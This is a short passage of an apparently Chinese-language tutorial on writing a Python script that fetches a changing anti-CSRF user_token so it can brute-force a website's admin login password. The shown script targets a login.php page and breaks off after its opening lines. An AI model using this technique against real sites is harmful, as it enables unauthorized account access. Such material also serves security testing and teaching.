编写脚本获取 token 对网站后台密码破解 简介 脚本源码 简介 每次访问页面这个 user_token 都会变化导致不能重复提交。 验证原理每次页面生成 user_token 存在 seesion 里面每次登录用 session 里取出来 然后验证如果验证成功 就进行密码匹配。如果验证不成功就输出 csrf 错误。 脚本源码 #coding:utf-8 import requests import re url = "http://www.c3moon.com/login.php" def login(password): session = requests.ses